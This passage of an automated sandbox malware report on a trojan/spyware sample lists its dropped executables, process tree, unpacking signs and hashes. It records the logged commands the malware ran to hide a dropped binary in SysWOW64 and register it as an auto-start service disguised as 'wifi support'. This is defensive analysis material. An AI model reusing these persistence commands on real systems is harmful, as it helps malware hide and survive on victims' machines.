Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D30A50	23_2_02D30A50
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D30640	23_2_02D30640
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D30C40	23_2_02D30C40
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_03189770	31_2_03189770
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_03180470	31_2_03180470
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_03180462	31_2_03180462
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05731810	31_2_05731810
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_057353F8	31_2_057353F8
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05730448	31_2_05730448
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05732E48	31_2_05732E48
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05741528	31_2_05741528
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05744758	31_2_05744758
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574A733	31_2_0574A733
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_057467B8	31_2_057467B8
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_057490C0	31_2_057490C0
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05742C88	31_2_05742C88
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_057408B0	31_2_057408B0
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05745B58	31_2_05745B58
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_057490ED	31_2_057490ED
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_057490B2	31_2_057490B2
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05A1B5F8	31_2_05A1B5F8
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05A1BF30	31_2_05A1BF30

Source: cz2ZyeL2Zd.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cz2ZyeL2Zd.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cz2ZyeL2Zd.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8FB8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8FB8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 97B8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 97B8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 97B8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AEFA.exe.13.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: AEFA.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B729.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BFF4.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D830.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D830.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D830.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5D68.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5D68.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: EC9F.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: EC9F.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: EC9F.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2B8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2B8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2B8.exe.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: icgujuh.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: icgujuh.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: icgujuh.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ecgujuh.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ecgujuh.13.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rljdetbq.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rljdetbq.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rljdetbq.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Section loaded: mscorjit.dll	Jump to behavior

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\1F0B.exe 7AFBFF30F47AB9D8E3FC2B67A72453161B93424F680C0CAF270A57E05DD2478B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\5D68.exe 2BFA0884B172C9EAFF7358741C164F571F0565389AB9CF99A8E0B90AE8AD914D

Source: cz2ZyeL2Zd.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\SysWOW64\rhrovez\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: String function: 0042CE40 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: String function: 00422600 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: String function: 00422440 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: String function: 004048D0 appears 460 times

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00401962 Sleep,NtTerminateProcess,	3_2_00401962
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_0040196D Sleep,NtTerminateProcess,	3_2_0040196D
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_2_00402000
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	3_2_0040250A
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00401A0B NtTerminateProcess,	3_2_00401A0B
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_2_0040201A
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_2_0040201E
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_2_0040202D
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00402084 LocalAlloc,NtQuerySystemInformation,	3_2_00402084
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00402491 NtOpenKey,	3_2_00402491
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_1_00402000
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	3_1_0040250A
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_1_0040201A
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_1_0040201E
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	3_1_0040202D
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_00402084 LocalAlloc,NtQuerySystemInformation,	3_1_00402084
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_00402491 NtOpenKey,	3_1_00402491
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00401962 Sleep,NtTerminateProcess,	18_2_00401962
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_0040196D Sleep,NtTerminateProcess,	18_2_0040196D
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	18_2_00402000
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	18_2_0040250A
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00401A0B NtTerminateProcess,	18_2_00401A0B
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	18_2_0040201A
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	18_2_0040201E
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	18_2_0040202D
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00402084 LocalAlloc,NtQuerySystemInformation,	18_2_00402084
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00402491 NtOpenKey,	18_2_00402491
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_0040193B Sleep,NtTerminateProcess,	22_2_0040193B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00401947 Sleep,NtTerminateProcess,	22_2_00401947
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_0040174C NtMapViewOfSection,NtMapViewOfSection,Sleep,NtTerminateProcess,	22_2_0040174C
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00401951 Sleep,NtTerminateProcess,	22_2_00401951
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00401FF1 NtQuerySystemInformation,NtQuerySystemInformation,	22_2_00401FF1
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_004016FD NtMapViewOfSection,NtMapViewOfSection,	22_2_004016FD
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_0040158E NtMapViewOfSection,NtMapViewOfSection,	22_2_0040158E
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_004015A6 NtMapViewOfSection,NtMapViewOfSection,	22_2_004015A6
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_004015BC NtMapViewOfSection,NtMapViewOfSection,	22_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574EF00 NtUnmapViewOfSection,	31_2_0574EF00
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574EFE0 NtAllocateVirtualMemory,	31_2_0574EFE0
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574EFD8 NtAllocateVirtualMemory,	31_2_0574EFD8
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574EFB3 NtAllocateVirtualMemory,	31_2_0574EFB3
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574EEFB NtUnmapViewOfSection,	31_2_0574EEFB

Source: cz2ZyeL2Zd.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 97B8.exe.13.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: AEFA.exe.13.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: BFF4.exe.13.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: D830.exe.13.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: EC9F.exe.13.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2B8.exe.13.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: icgujuh.13.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rljdetbq.exe.26.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: AEFA.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B729.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Source: B729.exe.13.dr

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: cz2ZyeL2Zd.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@37/25@67/15

Source: C:\Users\user\AppData\Local\Temp\2B8.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: cz2ZyeL2Zd.exe

Virustotal: Detection: 33%

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cz2ZyeL2Zd.exe "C:\Users\user\Desktop\cz2ZyeL2Zd.exe"
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Process created: C:\Users\user\Desktop\cz2ZyeL2Zd.exe "C:\Users\user\Desktop\cz2ZyeL2Zd.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\icgujuh C:\Users\user\AppData\Roaming\icgujuh
Source: C:\Users\user\AppData\Roaming\icgujuh	Process created: C:\Users\user\AppData\Roaming\icgujuh C:\Users\user\AppData\Roaming\icgujuh
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5D68.exe C:\Users\user\AppData\Local\Temp\5D68.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EC9F.exe C:\Users\user\AppData\Local\Temp\EC9F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2B8.exe C:\Users\user\AppData\Local\Temp\2B8.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1F0B.exe C:\Users\user\AppData\Local\Temp\1F0B.exe
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\rhrovez\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\rljdetbq.exe" C:\Windows\SysWOW64\rhrovez\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create rhrovez binPath= "C:\Windows\SysWOW64\rhrovez\rljdetbq.exe /d\"C:\Users\user\AppData\Local\Temp\2B8.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process created: C:\Users\user\AppData\Local\Temp\1F0B.exe C:\Users\user\AppData\Local\Temp\1F0B.exe
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" description rhrovez "wifi internet conection
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Process created: C:\Users\user\Desktop\cz2ZyeL2Zd.exe "C:\Users\user\Desktop\cz2ZyeL2Zd.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5D68.exe C:\Users\user\AppData\Local\Temp\5D68.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EC9F.exe C:\Users\user\AppData\Local\Temp\EC9F.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Process created: C:\Users\user\AppData\Roaming\icgujuh C:\Users\user\AppData\Roaming\icgujuh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process created: C:\Users\user\AppData\Local\Temp\1F0B.exe C:\Users\user\AppData\Local\Temp\1F0B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\5D68.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1F0B.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5736:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: \H	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: \H	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Command line argument: E6B	22_2_0041CB7B

Source: 1F0B.exe.13.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1F0B.exe.13.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.2.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.2.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.1F0B.exe.de0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\5D68.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: cz2ZyeL2Zd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\hatisicovapehe\p.pdb source: 5D68.exe, 5D68.exe, 00000016.00000000.378270420.0000000000401000.00000020.00020000.sdmp, 5D68.exe, 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, 5D68.exe.13.dr, ecgujuh.13.dr
Source:	Binary string: C:\kekerotepuci_tilid-75-saworeka23-tomadur\6 sedotajo58_fita.pdb source: D830.exe.13.dr
Source:	Binary string: 9C:\pofecojuha\web\butasagit.pdb source: 2B8.exe.13.dr, rljdetbq.exe.26.dr
Source:	Binary string: C:\hexijomopeg-vob49\facabuyezuvet.pdb source: 97B8.exe.13.dr
Source:	Binary string: YC:\xexirujecutayo.pdb source: AEFA.exe.13.dr
Source:	Binary string: C:\besunutigubili\tik.pdb source: cz2ZyeL2Zd.exe, icgujuh.13.dr
Source:	Binary string: C:\pofecojuha\web\butasagit.pdb source: 2B8.exe.13.dr, rljdetbq.exe.26.dr
Source:	Binary string: FC:\tiz_simor\83_tazagukodofixe87\jusilirow94.pdb source: BFF4.exe.13.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: 8FB8.exe.13.dr
Source:	Binary string: C:\liziza-care-hozutuwikovap_tivohatudid\xemiwani23\d.pdb source: EC9F.exe.13.dr
Source:	Binary string: ^C:\kekerotepuci_tilid-75-saworeka23-tomadur\6 sedotajo58_fita.pdb source: D830.exe.13.dr
Source:	Binary string: C:\tiz_simor\83_tazagukodofixe87\jusilirow94.pdb source: BFF4.exe.13.dr
Source:	Binary string: C:\xexirujecutayo.pdb source: AEFA.exe.13.dr
Source:	Binary string: %C:\liziza-care-hozutuwikovap_tivohatudid\xemiwani23\d.pdb source: EC9F.exe.13.dr
Source:	Binary string: VC:\hatisicovapehe\p.pdb source: 5D68.exe, 00000016.00000000.378270420.0000000000401000.00000020.00020000.sdmp, 5D68.exe, 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, 5D68.exe.13.dr, ecgujuh.13.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Unpacked PE file: 23.2.EC9F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Unpacked PE file: 26.2.2B8.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Unpacked PE file: 22.2.5D68.exe.400000.0.unpack .text:ER;.data:W;.pamicak:W;.dos:W;.modav:W;.nugirof:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Unpacked PE file: 23.2.EC9F.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Unpacked PE file: 26.2.2B8.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 1F0B.exe.13.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 31.0.1F0B.exe.de0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 31.0.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 31.2.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 31.0.1F0B.exe.de0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
